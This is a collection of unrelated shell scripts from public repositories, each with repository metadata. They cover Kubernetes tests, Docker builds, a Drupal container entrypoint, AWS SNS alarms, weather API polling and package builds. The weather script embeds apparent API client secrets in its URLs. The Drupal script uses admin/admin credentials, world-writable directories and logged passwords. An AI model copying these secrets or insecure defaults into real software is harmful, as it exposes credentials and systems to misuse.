  TEST_ARGS="${TEST_ARGS} --gce-zone=${ZONES[0]}"
fi

if [[ "${CLOUD_PROVIDER}" == "gce" ]]; then
  # Same array fix as the AWS branch; backticks replaced with $().
  ZONES=($(kops get ig --name ${CLUSTER_NAME} -ojson | jq -r .[0].spec.zones[]))
  GCE_PROJECT=$(kops get cluster ${CLUSTER_NAME} -ojson | jq -r .spec.project)
  TEST_ARGS="${TEST_ARGS} --provider=gce --gce-zone=${ZONES[0]} --gce-project=${GCE_PROJECT}"
fi

# Run the e2e suite (serial/slow/flaky buckets skipped) against the
# upgraded cluster, pinning the test package to the starting version.
kubetest2 kops ${KUBETEST2_COMMON_ARGS} \
    --cloud-provider=${CLOUD_PROVIDER} \
    --test=kops \
    -- \
    --test-package-version=v1.18.15 \
    --parallel 25 \
    --skip-regex="\[Slow\]|\[Serial\]|\[Disruptive\]|\[Flaky\]|\[Feature:.+\]|\[HPA\]|Dashboard|RuntimeClass|RuntimeHandler|TCP.CLOSE_WAIT|Projected.configMap.optional.updates" \
    --test-args="${TEST_ARGS}"
| true
|
5ef46b2d0f2f1f871e783e03d2b4567ea9680193
|
Shell
|
yajamon/ios-screen-broadcasting-app
|
/bin/setup.sh
|
UTF-8
| 396
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash

# Generate the ScreenBroadcasting Xcode project with XcodeGen.
readonly DIRPATH=$(cd $(dirname ${BASH_SOURCE:-$0})/; pwd)
readonly REPO_ROOT=$(cd $DIRPATH/..; pwd)
readonly PROJECT_NAME='ScreenBroadcasting'

# Use `command -v` instead of `type -a`: it is POSIX-portable and does not
# print the resolved path(s) to stdout when the tool is present.
if ! command -v xcodegen > /dev/null 2>&1; then
    echo "Missing command: xcodegen" >&2
    exit 1
fi

if ! test -d "$REPO_ROOT/$PROJECT_NAME"; then
    echo "Missing: $REPO_ROOT/$PROJECT_NAME" >&2
    exit 1
fi

cd "$REPO_ROOT/$PROJECT_NAME"
xcodegen generate
| true
|
13911ef6670e58df7a6fcfe5c6d998fad1d87554
|
Shell
|
moul/docker-drupal
|
/start.sh
|
UTF-8
| 2,067
| 3.4375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Container entry script for the Drupal image: starts sshd, restores persisted
# configuration from the /data volume, generates credentials on first run,
# seeds MySQL and installs Drupal when missing, then hands off to supervisord.

echo "Starting SSHD"
/usr/sbin/sshd -D &

# Optional root SSH password persisted on the volume.
if [ -f /data/ssh-pw.txt ]; then
echo "root:$(cat /data/ssh-pw.txt)" | chpasswd
fi

# Persisted PHP config and .htaccess take precedence over the image copies.
if [ -d /data/php5 ]; then
rm -rf /etc/php5
ln -s /data/php5 /etc/php5
fi
if [ -f /data/.htaccess ]; then
rm -f /var/www/.htaccess
ln -s /data/.htaccess /var/www/.htaccess
fi

# Keep drush archive dumps on the /data volume.
if [ ! -e /root/drush-backups/archive-dump ]; then
mkdir -p /data/backups/drush
ln -s /data/backups/drush /root/drush-backups/archive-dump
fi

# First run: unpack the Drupal sites directory onto the volume.
if [ ! -d /data/sites/default ]; then
echo "Installing Drupal sites"
cd /data; tar xzf /var/www/sites.tgz
fi
chown -R www-data:www-data /data/sites/
chmod -R a+w /data/sites/

# Generate credentials once and persist them so restarts reuse them.
if [ ! -f /data/mysql-root-pw.txt ]; then
echo "Generating mysql root password"
pwgen -c -n -1 12 > /data/mysql-root-pw.txt
fi
if [ ! -f /data/drupal-db-pw.txt ]; then
echo "Generating Drupal DB password"
pwgen -c -n -1 12 > /data/drupal-db-pw.txt
fi

DRUPAL_DB="drupal"
MYSQL_PASSWORD=$(cat /data/mysql-root-pw.txt)
DRUPAL_PASSWORD=$(cat /data/drupal-db-pw.txt)
MYSQL_STARTED=false  # tracks whether a temporary mysqld was launched below

# First run: seed the MySQL data dir, start a temporary server and create
# the drupal database and user.
if [ ! -d /data/mysql ]; then
echo "Installing Mysql tables"
cd /data && tar xf /var/lib/mysql.tgz
# Start mysql
MYSQL_STARTED=true
/usr/bin/mysqld_safe &
sleep 10s
mysqladmin -u root password $MYSQL_PASSWORD
echo mysql root password: $MYSQL_PASSWORD
echo drupal password: $DRUPAL_PASSWORD
mysql -uroot -p$MYSQL_PASSWORD -e "CREATE DATABASE drupal; GRANT ALL PRIVILEGES ON drupal.* TO 'drupal'@'localhost' IDENTIFIED BY '$DRUPAL_PASSWORD'; FLUSH PRIVILEGES;"
fi

# Install Drupal itself when no settings.php exists yet; mysql must be up.
if [ ! -f /data/sites/default/settings.php ]; then
echo "Installing Drupal"
# Start mysql
if [ "$MYSQL_STARTED" == "false" ]; then
MYSQL_STARTED=true
/usr/bin/mysqld_safe &
sleep 10s
fi
cd /var/www/
drush site-install standard -y --account-name=admin --account-pass=admin --db-url="mysqli://drupal:${DRUPAL_PASSWORD}@localhost:3306/drupal"
fi
if [ "$MYSQL_STARTED" == "true" ]; then
    # Stop the temporary mysqld we started for provisioning and give it time
    # to shut down before supervisord takes over process management.
    # Fixed: "killall mysqld sleep 10s" tried to kill processes named
    # "sleep" and "10s" instead of sleeping after the kill.
    killall mysqld
    sleep 10s
fi

echo "Starting Supervisord"
supervisord -n
| true
|
67508637894463682c519b6b2e9f44550a0e9989
|
Shell
|
lambdaloop/dotfiles
|
/scripts/cool_backgrounds.sh
|
UTF-8
| 284
| 2.5625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Re-link the ten rotating wallpaper slots (files named 0-9) to random
# images picked from the "small-filled" pool.

cd /home/pierre/Pictures/wallpapers/chosen/small-desktops
rm -f 0 1 2 3 4 5 6 7 8 9

for slot in {0..9}; do
    ln -s "$(find ~/Pictures/wallpapers/chosen/small-filled -type f -print | shuf | head -1)" $slot
done

notify-send "changed jellyfish backgrounds"
| true
|
4a26b27bddab4eb6cdce0c7cbffd0ba909bd3dea
|
Shell
|
otus-devops-2019-02/pavelpuchok_infra
|
/packer/scripts/install_app.sh
|
UTF-8
| 347
| 2.765625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Provision the reddit monolith app: install its systemd unit, create a
# dedicated user, clone the code and install gem dependencies.
set -e

readonly APP_USER=redditapp
readonly APP_DIR=/app
readonly UNIT_SOURCE=/tmp/redditapp.service
readonly UNIT_DEST=/etc/systemd/system/redditapp.service

mv "${UNIT_SOURCE}" "${UNIT_DEST}"
useradd -U "${APP_USER}"
git clone -b monolith https://github.com/express42/reddit.git "${APP_DIR}"
cd "${APP_DIR}" && bundle install
chown -R "${APP_USER}:${APP_USER}" "${APP_DIR}"
| true
|
595d51f81cba997437a1f31e9c412fdf6df350a3
|
Shell
|
lamont1008/COSC-350
|
/350/lab2/task6b.sh
|
UTF-8
| 1,650
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
# This program will print a left arrow to the screen
# skip Function
skip() {
    # Emit $1 spaces with no trailing newline (row indentation helper);
    # printf's field width replaces the original seq-driven loop.
    printf '%*s' "$1" ''
}
# printStars Function
# Print $1 stars, plus an optional extra $2 stars (the arrow "tail"),
# with no trailing newline.
printStars() {
    local i
    for ((i = 0; i < $1; i++)); do
        printf "*"
    done
    # Optional tail length. Quoted [ -n "$2" ] replaces the fragile
    # unquoted [ ! -z $2 ] of the original; the arithmetic for-loop also
    # avoids forking `seq` once per segment.
    if [ -n "$2" ]; then
        for ((i = 0; i < $2; i++)); do
            printf "*"
        done
    fi
}
# Get the length of base from user
echo "What wide length of base would you like?"
read wideBase
# The arrow head must be an odd number of rows so it has a single middle row.
if [ `expr "$wideBase" % 2` == 0 ];
then
echo "The wide length must be odd!"
exit 1
fi
# Get the length of the tail from the user
echo "What length of tail would you like?"
read tailSize
# Make sure neither length is less than 0
if [ "$wideBase" -lt 0 ] || [ "$tailSize" -lt 0 ];
then
echo "You cannot have a wide length or tail length less than 0"
exit 1
fi
# Set the number of skips to start with
let "skips=$wideBase-1"
# Set the top half number of rows
let "topHalf=$wideBase/2"
# Set the bottom half the same as the top half
bottomHalf=$topHalf
# Set the number of stars default
numOfStars=1
# Print the top half: each row is indented two fewer spaces and drawn two
# stars wider than the previous one.
for i in $(seq $topHalf);
do
skip $skips
printStars $numOfStars
echo
let "numOfStars+=2"
let "skips-=2"
done
# Print the middle (widest) row plus the tail appended to its right.
printStars $numOfStars $tailSize
echo
let "numOfStars-=2"
let "skips+=2"
# Print the bottom half of the arrow (mirror image of the top half).
for i in $(seq $bottomHalf);
do
skip $skips
printStars $numOfStars
echo
let "numOfStars-=2"
let "skips+=2"
done
echo "Tail $tailSize, Base $wideBase Left Arrow"
exit 0
| true
|
def944cef2586cfa1a1136de3d8a9e79f7bc69ce
|
Shell
|
abhilashmendhe/shell
|
/set-1/seventh
|
UTF-8
| 203
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
# Swap two integers without a temporary variable (sum/difference trick).
a=5000
b=1223
echo "Before swapping a is" $a
echo "Before swapping b is" $b
# a holds the sum; subtracting peels off each original value in turn.
a=$((a + b))
b=$((a - b))
a=$((a - b))
echo ""
# Bug fix: these two lines previously said "Before swapping" again.
echo "After swapping a is" $a
echo "After swapping b is" $b
| true
|
9d0798d3e4c43bbec527caacca5b66068e7e966c
|
Shell
|
karimfadl/kops-asg-notification
|
/SNS-Alarm.sh
|
UTF-8
| 1,279
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
# Interactive helper: create an SNS topic, subscribe an email address,
# and optionally attach CloudWatch alarms on ASG desired capacity.
# Ask the user for his Topic name
echo Hello, What is your Topic Name?
read vartopic
#Create Topic
aws sns create-topic --name $vartopic
# Extract the topic ARN from the listing by grepping for the name.
# NOTE(review): assumes the topic name is unique in the account's
# topic list — verify, otherwise the wrong ARN may be picked up.
topic_arn=$(aws sns list-topics | grep $vartopic | cut -d':' -f2,3,4,5,6,7 | sed 's/"//g')
#Create Email Subscription
# Ask the user for his Mail
echo What is your subscribe Email?
read varmail
aws sns subscribe --topic-arn $topic_arn --protocol email --notification-endpoint $varmail
#Create Alarm For ASG Group Desired Capacity
# Loop so the user can attach alarms to several ASGs; 'no' exits.
while true
do
read -r -p "Are You Need To Create Alarm with SNS Action For ASG? [Y/n] " input
case $input in
[yY][eE][sS]|[yY])
echo What is your Autoscaling Group Name?
read var_asg
echo What is Group Desired Capacity Threshold of ASG instances?
read var_threshold
# Alarm fires when desired capacity drops below the threshold.
aws cloudwatch put-metric-alarm --alarm-name $var_asg-Alarm --alarm-description "Check Kops ASG Group Desired Capacity" --metric-name GroupDesiredCapacity --namespace AWS/AutoScaling --statistic Average --period 300 --threshold $var_threshold --comparison-operator LessThanThreshold --dimensions Name=AutoScalingGroupName,Value=$var_asg --evaluation-periods 1 --alarm-actions $topic_arn
;;
[nN][oO]|[nN])
echo "Script Finished Check AWS Console"
exit
;;
*)
echo "Invalid input..."
;;
esac
done
| true
|
f26a7fa9d5c7f8acdcf507b6e22a36f5babbd627
|
Shell
|
TiS/docker-php
|
/build.sh
|
UTF-8
| 1,912
| 4.3125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Build (and optionally push) the tstruczynski/php Docker images for every
# supported PHP version. Flags: -v X.Y build/push one version; -u push.
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )"
REPOSITORY=tstruczynski/php
VERSIONS=( 7.0 7.1 7.2 7.3 7.4 8.0 8.1)
LATEST=7.4
UPLOAD=0
last_command="";
# Runs on EXIT via trap: report which command failed, preserve its status.
cleanup() {
rv=$?
if [ "$rv" != "0" ]; then
echo -e "\n\n\"${last_command}\" command failed with exit code $rv.\n\n";
fi
exit $rv
}
# Reverse map version -> index, used to validate the -v argument.
declare -A VERSION_MAP
for key in "${!VERSIONS[@]}"; do VERSION_MAP[${VERSIONS[$key]}]="$key"; done # see below
cd "$SCRIPT_DIR"
while getopts v:u flag
do
case "${flag}" in
u) UPLOAD=1;;
v)
if [[ -z "${VERSION_MAP[${OPTARG}]}" ]]; then echo "Version ${OPTARG} is unknown"; exit; fi;
ONLY_VERSION=${OPTARG};;
*) echo -e "\n\tUnknown flag ${flag}\n"; exit 1;;
esac
done
# Exit if any of the commands fails
set -e
# keep track of the last executed command
trap 'last_command=$current_command; current_command=$BASH_COMMAND;' DEBUG
# echo an error message before exiting
trap 'cleanup' EXIT
for version in "${VERSIONS[@]}"
do
if [[ -n "$ONLY_VERSION" && "$version" != "$ONLY_VERSION" ]]; then
echo "SKIPPING VERSION $version"
continue
fi;
cd "$version"
echo "Building version $version START"
# Extra build arguments come from the per-version .build-args file.
# shellcheck disable=SC2002
# shellcheck disable=SC2046
docker build . -t $REPOSITORY:"$version" $(cat .build-args | paste -s -d " " /dev/stdin)
if [ "$version" == "$LATEST" ]; then
docker tag $REPOSITORY:"$version" $REPOSITORY:latest
fi;
echo "Building version $version END"
cd ..
done
if [[ ${UPLOAD} != 1 ]]; then
echo -e "\n--------------\nUpload SKIPPED\n--------------"
exit
fi
echo "Uploading to GITHUB"
if [[ -n ${ONLY_VERSION} ]]; then
echo "Only version ${ONLY_VERSION}"
docker push $REPOSITORY:"${ONLY_VERSION}"
if [ "${ONLY_VERSION}" == "$LATEST" ]; then
docker push $REPOSITORY:latest
fi;
else
echo "All versions"
docker push -a $REPOSITORY
fi
| true
|
c60fedd998f9575adeb817277d0377eb07a86a28
|
Shell
|
e788b1/e1
|
/.i3/agit
|
UTF-8
| 658
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/bash
# agit: tiny helper for a directory of git repositories.
# Usage: agit run <script> [a1 a2 a3] | agit clone <url> | agit pullall
action=$1
option=$2
args1=$3
args2=$4
args3=$5
# Default repository root unless the caller exported GIT_REPOS.
[[ -z $GIT_REPOS ]] && GIT_REPOS=${HOME}/.git_repos
case "$action" in
run)
# Execute a script stored inside the repos directory.
"${GIT_REPOS}/${option}" "$args1" "$args2" "$args3"
;;
clone)
cd "${GIT_REPOS}" || exit 1
# If the clone already exists git clone fails; fall back to pulling master.
git clone "$option" || {
cd "$(basename "$option")" || exit 1
git pull origin master
}
;;
pullall)
# Iterate via globbing instead of parsing `ls` output (handles odd names).
for repo in "${GIT_REPOS}"/*; do
[[ ! -d ${repo}/.git ]] && continue
repo_name=$(basename "${repo}")
echo -e "\e[32mPulling ${repo_name} ...\e[0m"
cd "${repo}" || continue
git pull origin
done
;;
*);;
esac
| true
|
2a5fdb3ccfd44afa32760e56668caf1ec52f63fb
|
Shell
|
powertac/powertac-tools
|
/hamweather/scripts/aeris-weather-hourly
|
UTF-8
| 864
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
# Pulls down hourly observations and 24-hr forecasts for a list
# of locations
# NOTE(review): the Aeris client_id/client_secret are hard-coded in the URLs
# below; they leak via process listings and version control — consider moving
# them into environment variables or a protected config file.
locations=('chicago,il' 'minneapolis,mn' 'minot,nd' 'mason%20city,ia' 'tucson,az' 'el%20paso,tx' 'boulder,co' 'cheyenne,wy' 'rotterdam,nl')
output=weather_records.json
# Quote the date so its exact spacing is preserved in the log header.
echo '-- observation:' "$(date)" >>"$output"
for loc in "${locations[@]}"; do
echo '-- location:' "$loc" >>"$output"
wget -O tmp "http://api.aerisapi.com/observations/${loc}?client_id=k2dblnXBvHTqWJy4dKZDr&client_secret=OQMHAbaapWFsRKWp1ybZ2ZyHhycRPIJydt7LurMs&fields=ob.dateTimeISO,ob.tempC,ob.dewpointC,ob.pressureMB,ob.windKPH"
cat tmp >>"$output"
echo >>"$output"
wget -O tmp "http://api.aerisapi.com/forecasts/${loc}?filter=1hr&client_id=k2dblnXBvHTqWJy4dKZDr&client_secret=OQMHAbaapWFsRKWp1ybZ2ZyHhycRPIJydt7LurMs&limit=24&fields=periods.dateTimeISO,periods.tempC,periods.dewpointC,periods.sky,periods.windSpeedKPH"
cat tmp >>"$output"
echo >>"$output"
done
| true
|
c8949bdb22b1e3cad6c4bb898f3c142091088f59
|
Shell
|
priestlab/cnv-ukb
|
/gwas/run_cnv_burden.sh
|
UTF-8
| 910
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/bash
# Run a plink2 CNV-burden GWAS for one phenotype in the UK Biobank data.
# define command line arguments for phenotype, name, app_id, bin/qt (needed?)
# usage: script.sh phe_name app_id path/to/file.phe bin/qt
pheID=$1
appID=$2
pheFile=$3
# Binary traits use Firth fallback regression; quantitative use the default.
if [ "$4" == "bin" ]; then
kind="firth-fallback"
elif [ "$4" == "qt" ]; then
kind=""
else
echo "unrecognized gwas type $4"
exit 2
fi
# useful
dataRoot="/oak/stanford/groups/jpriest/cnv_ukb"
# 'ml' is the HPC module loader (Lmod).
ml load plink2
# plink command
# Covariates include age, sex, 4 PCs, CNV count and total CNV length;
# sample set is restricted to the unrelated white-British keep list.
plink2 --bed "${dataRoot}/resources/burden.bed" \
--bim "${dataRoot}/resources/burden.bim" \
--fam "${dataRoot}/resources/burden.app${appID}.fam" \
--glm hide-covar ${kind} \
--pheno ${pheFile} \
--covar "${dataRoot}/gwas/resources/ukb${appID}_cnv_burden.covar" \
--covar-name age sex PC1-PC4 N_CNV LEN_CNV \
--keep "${dataRoot}/gwas/resources/ukb${appID}_CNV-GWAS.wb-unrel.keep.txt" \
--out "${dataRoot}/burden/output/${pheID}.genic.cnv.burden"
| true
|
acf0db10a35ecbbbbba3f392d326a7f25cfa520f
|
Shell
|
yahaa/Shell
|
/test1.bash
|
UTF-8
| 146
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
# Small demo of variable expansion and shell arithmetic.
a="hello world !"
echo "A is :$a"
num=2
printf '%s\n' "this is the $num"
printf '%s\n' "this is the ${num}nd"
var=0
(( var += 100 ))
echo "$var"
| true
|
34a977ef9fd35a651d592718fbf0ba2d416541d6
|
Shell
|
mask616/common-tools
|
/system-ct-server/polling-daemon/rootfs/www/bin/start_polling-daemon.sh
|
UTF-8
| 724
| 3.1875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Self-registering cron job: ensure this script runs every minute from
# root's crontab, then start the maintenance-data job and log the result.
cron_file='/var/spool/cron/root'
cron_log_file='/www/bin/cron_start_polling-daemon.log'
# The log is overwritten each run; only the last start time is kept.
echo $(date) > $cron_log_file
# Register the crontab entry once, then reload crond.
if ! grep -Fxq '*/1 * * * * /bin/sh /www/bin/start_polling-daemon.sh' $cron_file; then
echo '*/1 * * * * /bin/sh /www/bin/start_polling-daemon.sh' >> $cron_file
/usr/sbin/crond reload
echo 'crontab reload' >> $cron_log_file
fi
echo 'maintenance-data crontab start...' >> $cron_log_file
# Test the command's exit status directly rather than inspecting $? after
# the fact (the old '[ $? == 0 ]' form is fragile and a bashism).
if /bin/sh /www/maintenance-data/src/start_md.sh; then
echo 'maintenance-data crontab success' >> $cron_log_file
else
echo 'maintenance-data crontab fail' >> $cron_log_file
fi
| true
|
57380b8e9f23309eeeb43f91512eaeaf6e8b6153
|
Shell
|
rubixlinux/community
|
/laptop-mode-tools/PKGBUILD
|
UTF-8
| 1,840
| 2.96875
| 3
|
[] |
no_license
|
# Maintainer: Joshua Rubin <joshua@rubixlinux.org>
pkgname=laptop-mode-tools
pkgver=1.11
pkgrel=1
# Bug fix: the inner quotes around "mode" were unescaped and terminated the
# pkgdesc string early; escape them so the description is one literal string.
pkgdesc="Laptop mode (also known as laptopmode, laptop-mode and laptop_mode, for search engine purposes :) ) is a kernel \"mode\" that allows you to extend the battery life of your laptop. It does this by intelligently grouping write activity on your disks, so that only reads of uncached data result in a disk spinup. It causes a significant improvement in battery life (for usage patterns that allow it)."
url="http://www.xs4all.nl/~bsamwel/laptop_mode"
backup=('etc/laptop-mode/laptop-mode.conf')
depends=('kernel26' 'acpid')
source=(http://www.xs4all.nl/~bsamwel/laptop_mode/tools/downloads/laptop-mode-tools_${pkgver}.tar.gz \
laptop-mode )
md5sums=('f5c882e2ba1953b80abd1d7cd38c3a51' \
'5ab2cd36f47971f9b8215d6d7e450f5f' )
## Todo:
## None
## Notes:
## None
## Changelog:
## rel1: upgraded to 1.11, updated rc script to new format 2006.01.17
## rel1: initial rubix release
# Install configuration, daemons, ACPI hooks, rc script, man pages and docs
# into the staging directory.
build() {
cd $startdir/src/$pkgname-$pkgver
mkdir -p $startdir/pkg/etc/laptop-mode
cp etc/laptop-mode/laptop-mode.conf $startdir/pkg/etc/laptop-mode
mkdir -p $startdir/pkg/usr/sbin
cp usr/sbin/laptop_mode $startdir/pkg/usr/sbin
cp usr/sbin/lm-syslog-setup $startdir/pkg/usr/sbin
mkdir -p $startdir/pkg/etc/acpi/actions
cp etc/acpi/actions/* $startdir/pkg/etc/acpi/actions
mkdir -p $startdir/pkg/etc/acpi/events
cp etc/acpi/events/* $startdir/pkg/etc/acpi/events
mkdir -p $startdir/pkg/etc/rc.d
cp $startdir/src/laptop-mode $startdir/pkg/etc/rc.d
mkdir -p $startdir/pkg/usr/man/man8
cp man/* $startdir/pkg/usr/man/man8
mkdir -p $startdir/pkg/usr/doc/$pkgname-$pkgver
cp -a \
COPYING \
Documentation/* \
README \
$startdir/pkg/usr/doc/$pkgname-$pkgver
# Use ':' as the owner:group separator; the '.' form is deprecated.
chown -R root:bin $startdir/pkg/usr/sbin
}
| true
|
6a999e51d0796987d65d542cdb2a573b138dadd6
|
Shell
|
spesmilo/electrum
|
/contrib/trigger_deploy.sh
|
UTF-8
| 915
| 3.71875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Triggers deploy.sh to maybe update the website or move binaries.
# uploadserver needs to be defined in /etc/hosts
SSHUSER=$1
TRIGGERVERSION=$2
if [ -z "$SSHUSER" ] || [ -z "$TRIGGERVERSION" ]; then
    echo "usage: $0 SSHUSER TRIGGERVERSION"
    echo "e.g. $0 thomasv 3.0.0"
    echo "e.g. $0 thomasv website"
    exit 1
fi
set -ex
cd "$(dirname "$0")"
if [ "$TRIGGERVERSION" == "website" ]; then
    rm -f trigger_website
    touch trigger_website
    echo "uploading file: trigger_website..."
    sftp -oBatchMode=no -b - "$SSHUSER@uploadserver" << !
cd electrum-downloads-airlock
mput trigger_website
bye
!
else
    rm -f trigger_binaries
    # Bug fix: never use external data as the printf FORMAT string — a
    # version like "1%s" would corrupt the output. Pass it as an argument.
    printf '%s' "$TRIGGERVERSION" > trigger_binaries
    echo "uploading file: trigger_binaries..."
    sftp -oBatchMode=no -b - "$SSHUSER@uploadserver" << !
cd electrum-downloads-airlock
mput trigger_binaries
bye
!
fi
| true
|
edc526dc28ba79c163eb96973e420fb44676f970
|
Shell
|
c2997108/OpenPortablePipeline
|
/PortablePipeline/scripts/post-assemble~busco_v5
|
UTF-8
| 11,172
| 3.53125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# PortablePipeline wrapper that runs BUSCO v5 completeness assessment on an
# assembled genome. The explanation/inputdef/optiondef strings below are
# pipeline-framework metadata parsed by common.sh, not executed code.
explanation='
The Benchmarking Universal Single-Copy Ortholog assessment tool.
Based on evolutionarily-informed expectations of gene content of near-universal single-copy orthologs, BUSCO metric is complementary to technical metrics like N50.
'
inputdef='
input_1::An assembled genome file:*.fa,*.fasta,*.fsa,*.fna,*.fa.gz,*.fasta.gz,*.fsa.gz,*.fna.gz
'
optiondef='
opt_c:cpu threads:8
opt_m:memory limit (GB):32
opt_b:orthofinder options:-l eukaryota_odb10 -m genome
'
runcmd="$0 -c #opt_c# -m #opt_m# -b #opt_b# #input_1#"
# Container images used by the DO_* helpers defined in common.sh.
export IM_BUSCO="ezlabgva/busco:v5.3.2_cv1"
export IM_BASE="c2997108/centos7:metacor7"
# common.sh supplies DO_BASE/DO_BUSCO, N_CPU and post_processing.
source $(dirname `readlink -f $0 || echo $0`)/common.sh
set -eux
set -o pipefail
# Transparently decompress a gzipped assembly before running BUSCO.
if [ `echo "$input_1"|grep "[.]gz$"|wc -l||true` = 1 ]; then DO_BASE gzip -dc "$input_1" > `echo "$input_1"|sed 's/[.]gz$//'`; input_1=`echo "$input_1"|sed 's/[.]gz$//'`; fi
DO_BUSCO busco -i "$input_1" -o "`basename \"$input_1\"`".busco -c $N_CPU $opt_b
post_processing
#<option detail>
#<opt_b>
-m MODE, --mode MODE Specify which BUSCO analysis mode to run.
There are three valid modes:
- geno or genome, for genome assemblies (DNA)
- tran or transcriptome, for transcriptome assemblies (DNA)
- prot or proteins, for annotated gene sets (protein)
-l LINEAGE, --lineage_dataset LINEAGE
Specify the name of the BUSCO lineage to be used.
--augustus Use augustus gene predictor for eukaryote runs
--augustus_parameters --PARAM1=VALUE1,--PARAM2=VALUE2
Pass additional arguments to Augustus. All arguments should be contained within a single string with no white space, with each argument separated by a comma.
--augustus_species AUGUSTUS_SPECIES
Specify a species for Augustus training.
--auto-lineage Run auto-lineage to find optimum lineage path
--auto-lineage-euk Run auto-placement just on eukaryote tree to find optimum lineage path
--auto-lineage-prok Run auto-lineage just on non-eukaryote trees to find optimum lineage path
-c N, --cpu N Specify the number (N=integer) of threads/cores to use.
--config CONFIG_FILE Provide a config file
--datasets_version DATASETS_VERSION
Specify the version of BUSCO datasets, e.g. odb10
--download [dataset ...]
Download dataset. Possible values are a specific dataset name, "all", "prokaryota", "eukaryota", or "virus". If used together with other command line arguments, make sure to place this last.
--download_base_url DOWNLOAD_BASE_URL
Set the url to the remote BUSCO dataset location
--download_path DOWNLOAD_PATH
Specify local filepath for storing BUSCO dataset downloads
-e N, --evalue N E-value cutoff for BLAST searches. Allowed formats, 0.001 or 1e-03 (Default: 1e-03)
-f, --force Force rewriting of existing files. Must be used when output files with the provided name already exist.
-h, --help Show this help message and exit
--limit N How many candidate regions (contig or transcript) to consider per BUSCO (default: 3)
--list-datasets Print the list of available BUSCO datasets
--long Optimization Augustus self-training mode (Default: Off); adds considerably to the run time, but can improve results for some non-model organisms
--metaeuk_parameters "--PARAM1=VALUE1,--PARAM2=VALUE2"
Pass additional arguments to Metaeuk for the first run. All arguments should be contained within a single string with no white space, with each argument separated by a comma.
--metaeuk_rerun_parameters "--PARAM1=VALUE1,--PARAM2=VALUE2"
Pass additional arguments to Metaeuk for the second run. All arguments should be contained within a single string with no white space, with each argument separated by a comma.
--offline To indicate that BUSCO cannot attempt to download files
--out_path OUTPUT_PATH
Optional location for results folder, excluding results folder name. Default is current working directory.
-q, --quiet Disable the info logs, displays only errors
-r, --restart Continue a run that had already partially completed.
--tar Compress some subdirectories with many files to save space
--update-data Download and replace with last versions all lineages datasets and files necessary to their automated selection
-v, --version Show this version and exit
Datasets available to be used with BUSCO v4 and v5:
bacteria_odb10
- acidobacteria_odb10
- actinobacteria_phylum_odb10
- actinobacteria_class_odb10
- corynebacteriales_odb10
- micrococcales_odb10
- propionibacteriales_odb10
- streptomycetales_odb10
- streptosporangiales_odb10
- coriobacteriia_odb10
- coriobacteriales_odb10
- aquificae_odb10
- bacteroidetes-chlorobi_group_odb10
- bacteroidetes_odb10
- bacteroidia_odb10
- bacteroidales_odb10
- cytophagia_odb10
- cytophagales_odb10
- flavobacteriia_odb10
- flavobacteriales_odb10
- sphingobacteriia_odb10
- chlorobi_odb10
- chlamydiae_odb10
- chloroflexi_odb10
- cyanobacteria_odb10
- chroococcales_odb10
- nostocales_odb10
- oscillatoriales_odb10
- synechococcales_odb10
- firmicutes_odb10
- bacilli_odb10
- bacillales_odb10
- lactobacillales_odb10
- clostridia_odb10
- clostridiales_odb10
- thermoanaerobacterales_odb10
- selenomonadales_odb10
- tissierellia_odb10
- tissierellales_odb10
- fusobacteria_odb10
- fusobacteriales_odb10
- planctomycetes_odb10
- proteobacteria_odb10
- alphaproteobacteria_odb10
- rhizobiales_odb10
- rhizobium-agrobacterium_group_odb10
- rhodobacterales_odb10
- rhodospirillales_odb10
- rickettsiales_odb10
- sphingomonadales_odb10
- betaproteobacteria_odb10
- burkholderiales_odb10
- neisseriales_odb10
- nitrosomonadales_odb10
- delta-epsilon-subdivisions_odb10
- deltaproteobacteria_odb10
- desulfobacterales_odb10
- desulfovibrionales_odb10
- desulfuromonadales_odb10
- epsilonproteobacteria_odb10
- campylobacterales_odb10
- gammaproteobacteria_odb10
- alteromonadales_odb10
- cellvibrionales_odb10
- chromatiales_odb10
- enterobacterales_odb10
- legionellales_odb10
- oceanospirillales_odb10
- pasteurellales_odb10
- pseudomonadales_odb10
- thiotrichales_odb10
- vibrionales_odb10
- xanthomonadales_odb10
- spirochaetes_odb10
- spirochaetia_odb10
- spirochaetales_odb10
- synergistetes_odb10
- tenericutes_odb10
- mollicutes_odb10
- entomoplasmatales_odb10
- mycoplasmatales_odb10
- thermotogae_odb10
- verrucomicrobia_odb10
archaea_odb10
- thaumarchaeota_odb10
- thermoprotei_odb10
- thermoproteales_odb10
- sulfolobales_odb10
- desulfurococcales_odb10
- euryarchaeota_odb10
- thermoplasmata_odb10
- methanococcales_odb10
- methanobacteria_odb10
- methanomicrobia_odb10
- methanomicrobiales_odb10
- halobacteria_odb10
- halobacteriales_odb10
- natrialbales_odb10
- haloferacales_odb10
eukaryota_odb10
- alveolata_odb10
- apicomplexa_odb10
- aconoidasida_odb10
- plasmodium_odb10
- coccidia_odb10
- euglenozoa_odb10
- fungi_odb10
- ascomycota_odb10
- dothideomycetes_odb10
- capnodiales_odb10
- pleosporales_odb10
- eurotiomycetes_odb10
- chaetothyriales_odb10
- eurotiales_odb10
- onygenales_odb10
- leotiomycetes_odb10
- helotiales_odb10
- saccharomycetes_odb10
- sordariomycetes_odb10
- glomerellales_odb10
- hypocreales_odb10
- basidiomycota_odb10
- agaricomycetes_odb10
- agaricales_odb10
- boletales_odb10
- polyporales_odb10
- tremellomycetes_odb10
- microsporidia_odb10
- mucoromycota_odb10
- mucorales_odb10
- metazoa_odb10
- arthropoda_odb10
- arachnida_odb10
- insecta_odb10
- endopterygota_odb10
- diptera_odb10
- hymenoptera_odb10
